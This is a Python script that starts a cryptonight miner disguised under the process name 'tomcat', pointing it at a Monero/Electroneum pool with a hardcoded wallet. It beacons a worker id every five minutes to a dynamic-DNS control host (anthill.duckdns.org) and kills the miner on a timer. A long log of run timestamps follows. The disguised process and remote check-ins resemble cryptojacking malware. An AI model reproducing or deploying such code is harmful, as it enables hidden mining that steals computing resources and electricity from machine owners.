import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:27:02.184424
#2018-02-17 16:13:06.419754
#2018-02-17 18:00:08.866745
#2018-02-17 19:47:06.659304
#2018-02-17 21:36:03.852509
#2018-02-17 23:20:08.006211
#2018-02-18 01:09:07.966339
#2018-02-18 02:57:04.425912
#2018-02-18 04:47:06.577714
#2018-02-18 06:39:03.394981
#2018-02-18 08:28:06.341286
#2018-02-18 10:15:08.716607
#2018-02-18 12:01:04.795038
#2018-02-18 13:46:01.924364
#2018-02-18 15:34:06.777525
#2018-02-18 17:22:01.884983
#2018-02-18 19:11:06.993601
#2018-02-18 20:57:06.898561
#2018-02-18 22:44:07.201769
#2018-02-19 00:33:01.600263
#2018-02-19 02:18:06.841813
#2018-02-19 04:05:07.450207
#2018-02-19 05:49:04.167367
#2018-02-19 07:37:05.072624
#2018-02-19 09:26:06.268910
#2018-02-19 11:15:01.630902
#2018-02-19 13:02:04.883202
#2018-02-19 14:51:08.848902
#2018-02-19 16:39:08.908964
#2018-02-19 18:26:06.022044
#2018-02-19 20:11:07.914798
#2018-02-19 22:01:01.682669
#2018-02-19 23:46:07.880167
#2018-02-20 01:33:02.026348
#2018-02-20 03:20:08.207148
#2018-02-20 05:07:06.449833
#2018-02-20 06:51:06.685825
#2018-02-20 08:38:06.854344
#2018-02-20 10:22:06.897655
#2018-02-20 12:07:06.383362
#2018-02-20 13:53:10.031665
#2018-02-20 15:38:10.823972
#2018-02-20 17:22:06.572616
#2018-02-20 19:11:06.202044
#2018-02-20 20:59:05.947066
#2018-02-20 22:45:01.727584
#2018-02-21 00:28:02.122505
#2018-02-21 02:14:07.841816
#2018-02-21 04:02:01.828660
#2018-02-21 05:48:07.365128
#2018-02-21 07:37:05.944976
#2018-02-21 09:22:04.344798
#2018-02-21 11:10:09.848973
#2018-02-21 12:58:04.214755
#2018-02-21 14:47:08.456210
#2018-02-21 16:36:05.082064
#2018-02-21 18:26:07.134280
#2018-02-21 20:13:01.673164
#2018-02-21 22:01:06.846079
#2018-02-21 23:48:01.448975
#2018-02-22 01:37:04.750761
#2018-02-22 03:27:06.800421
#2018-02-22 05:14:01.727074
#2018-02-22 06:57:04.071826
#2018-02-22 08:44:02.009123
#2018-02-22 10:32:05.919974
#2018-02-22 12:18:07.839437
#2018-02-22 14:02:06.728066
#2018-02-22 15:51:01.764012
#2018-02-22 17:38:05.508607
#2018-02-22 19:24:09.580688
#2018-02-22 21:16:09.694783
#2018-02-22 23:01:01.572236
#2018-02-23 00:47:07.289417
#2018-02-23 02:35:09.487294
#2018-02-23 04:24:04.411467
#2018-02-23 06:10:06.981197
#2018-02-23 07:57:07.640165
#2018-02-23 10:13:01.461946
#2018-02-23 12:06:09.474343
#2018-02-23 13:55:06.692136
#2018-02-23 15:46:04.385200
#2018-02-23 17:31:09.873577
#2018-02-23 19:19:06.061101
#2018-02-23 21:05:01.401675
#2018-02-23 22:49:04.583436
#2018-02-24 00:37:05.609479
#2018-02-24 02:27:01.628101
#2018-02-24 04:17:05.545064
#2018-02-24 06:05:08.260217
#2018-02-24 07:52:06.086973
#2018-02-24 09:37:01.982786
#2018-02-24 11:31:05.001313
#2018-02-24 13:21:04.482925
#2018-02-24 15:10:08.477881
#2018-02-24 16:59:01.576858
#2018-02-24 18:47:05.923979
#2018-02-24 20:37:04.934801
#2018-02-24 22:42:04.907009
#2018-02-25 01:49:06.867222
#2018-02-25 05:17:05.049896
#2018-02-25 11:23:02.119884